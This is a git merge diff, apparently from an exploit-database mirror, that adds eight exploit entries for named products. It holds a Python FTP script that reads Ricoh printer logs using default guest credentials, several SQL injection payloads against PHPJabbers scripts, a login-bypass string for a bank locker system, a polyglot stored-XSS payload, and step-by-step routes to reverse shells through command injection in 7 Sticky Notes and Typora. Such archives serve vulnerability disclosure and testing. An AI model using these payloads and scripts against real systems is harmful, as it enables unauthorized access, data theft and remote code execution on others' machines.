Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/hardware/remote/51755.py

@@ -0,0 +1,52 @@
+#Exploit Title: Ricoh Printer Directory and File Exposure
+#Date: 9/15/2023
+#Exploit Author: Thomas Heverin (Heverin Hacker)
+#Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
+#Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
+#Version: Ricoh Printers - All Versions
+#Tested on: Windows
+#CVE: N/A
+
+#Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)
+
+from ftplib import FTP
+
+def ftp_connect(ip):
+    try:
+        ftp = FTP(ip)
+        ftp.login("guest", "guest")
+        print(f"Connected to {ip} over FTP as 'guest'")
+        return ftp
+    except Exception as e:
+        print(f"Failed to connect to {ip} over FTP: {e}")
+        return None
+
+if __name__ == "__main__":
+    target_ip = input("Enter the Ricoh Printer IP address: ")
+
+    ftp_connection = ftp_connect(target_ip)
+    if ftp_connection:
+        try:
+            while True:
+                file_list = ftp_connection.nlst()
+                print("List of Ricoh printer files and directories:")
+                for index, item in enumerate(file_list, start=1):
+                    print(f"{index}. {item}")
+
+                file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
+                if file_index < 0:
+                    break
+
+                if 0 <= file_index < len(file_list):
+                    selected_file = file_list[file_index]
+                    lines = []
+                    ftp_connection.retrlines("RETR " + selected_file, lines.append)
+                    print(f"Contents of '{selected_file}':")
+                    for line in lines:
+                        print(line)
+                else:
+                    print("Invalid file index.")
+        except Exception as e:
+            print(f"Failed to perform operation: {e}")
+        finally:
+            ftp_connection.quit()

exploits/php/remote/51749.TXT

@@ -0,0 +1,32 @@
+## Title: Equipment Rental Script-1.0 - SQLi
+## Author: nu11secur1ty
+## Date: 09/12/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The package_id parameter appears to be vulnerable to SQL injection
+attacks. The payload ' was submitted in the package_id parameter, and
+a database error message was returned. You should review the contents
+of the error message, and the application's handling of other input,
+to confirm whether a vulnerability is present. The attacker can steal
+all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: #1* ((custom) POST)
+    Type: error-based
+    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+    Payload: package_id=(-4488))) OR 1 GROUP BY
+CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
+END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
+MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+home page: https://www.nu11secur1ty.com/

exploits/php/remote/51750.TXT

@@ -0,0 +1,17 @@
+# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS
+# Application: Blood Donor Management System
+# Version: v2.2
+# Bugs:  Stored XSS
+# Technology: PHP
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
+# Date: 12.09.2023
+# Author: SoSPiro
+# Tested on: Windows
+
+#POC
+========================================
+1. Login to admin account
+2. Go to /admin/update-contactinfo.php
+3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload.
+4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.

exploits/php/webapps/51751.TXT

@@ -0,0 +1,29 @@
+# Exploit Title: Bank Locker Management System - SQL Injection
+# Application: Bank Locker Management System
+# Date: 12.09.2023
+# Bugs: SQL Injection
+# Exploit Author: SoSPiro
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/
+# Tested on: Windows 10 64 bit Wampserver
+
+## Description:
+This report highlights a critical SQL Injection vulnerability discovered in the "Bank Locker Management System" application. The vulnerability allows an attacker to bypass authentication and gain unauthorized access to the application.
+
+## Vulnerability Details:
+- **Application Name**: Bank Locker Management System
+- **Software Link**: [Download Link](https://phpgurukul.com/bank-locker-management-system-using-php-and-mysql/)
+- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)
+
+## Vulnerability Description:
+The SQL Injection vulnerability is present in the login mechanism of the application. By providing the following payload in the login and password fields:
+
+Payload: admin' or '1'='1-- -
+
+An attacker can gain unauthorized access to the application with administrative privileges.
+
+## Proof of Concept (PoC):
+1. Visit the application locally at http://blms.local (assuming it's hosted on localhost).
+2. Navigate to the "banker" directory: http://blms.local/banker/
+3. In the login and password fields, input the following payload:
+4. admin' or '1'='1-- -

exploits/php/webapps/51753.TXT

@@ -0,0 +1,29 @@
+## Title: Fundraising Script-1.0 SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `cid` parameter appears to be vulnerable to SQL injection attacks.
+The payload ' was submitted in the cid parameter, and a database error
+message was returned.
+The database is empty, but if it is not, this will be over for the
+money of the donors and their bank accounts!
+The attacker can steal all information from the database!
+
+[+]Payload:
+mysql
+
+Parameter: cid (GET)
+    Type: error-based
+    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
+    Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
+(ELT(1741=1741,1))),0x7162787171),3873))
+
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty <http://nu11secur1ty.com/>

exploits/php/webapps/51754.TXT

@@ -0,0 +1,45 @@
+## Title: PHP Shopping Cart-4.2 Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 09/13/2023
+## Vendor: https://www.phpjabbers.com/
+## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `id` parameter appears to be vulnerable to SQL injection attacks.
+A single quote was submitted in the id parameter, and a database error
+message was returned. Two single quotes were then submitted and the
+error message disappeared. The attacker easily can steal all
+information from the database of this web application!
+WARNING! All of you: Be careful what you buy! This will be your responsibility!
+
+[+]Payload:
+mysql
+
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
+3795=3795-- sRcp&session_id=
+
+    Type: error-based
+    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (GTID_SUBSET)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
+(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
+(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2
+
+## Proof and Exploit:
+https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty <http://nu11secur1ty.com/>

exploits/windows/local/51748.TXT

@@ -0,0 +1,22 @@
+# Exploit Title: 7 Sticky Notes v1.9 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 12.09.2023
+# Vendor Homepage: http://www.7stickynotes.com
+# Software Link:
+http://www.7stickynotes.com/download/Setup7StickyNotesv19.exe
+# Tested Version: 1.9 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # #  Steps to Reproduce # # #
+
+# Open the program.
+# Click on "New Note".
+# Navigate to the "Alarms" tab.
+# Click on either of the two buttons.
+# From the "For" field, select "1" and "seconds" (to obtain the shell
+within 1 second).
+# From the "Action" dropdown, select "command".
+# In the activated box, enter the reverse shell command and click the "Set"
+button to set the alarm.
+# Finally, click on the checkmark to save the alarm.
+# Reverse shell obtained!

exploits/windows/local/51752.TXT

@@ -0,0 +1,18 @@
+# Exploit Title: Typora v1.7.4 - OS Command Injection
+# Discovered by: Ahmet Ümit BAYRAM
+# Discovered Date: 13.09.2023
+# Vendor Homepage: http://www.typora.io
+# Software Link: https://download.typora.io/windows/typora-setup-ia32.exe
+# Tested Version: v1.7.4 (latest)
+# Tested on: Windows 2019 Server 64bit
+
+# # #  Steps to Reproduce # # #
+
+# Open the application
+# Click on Preferences from the File menu
+# Select PDF from the Export tab
+# Check the “run command” at the bottom right and enter your reverse shell
+command into the opened box
+# Close the page and go back to the File menu
+# Then select PDF from the Export tab and click Save
+# Reverse shell is ready!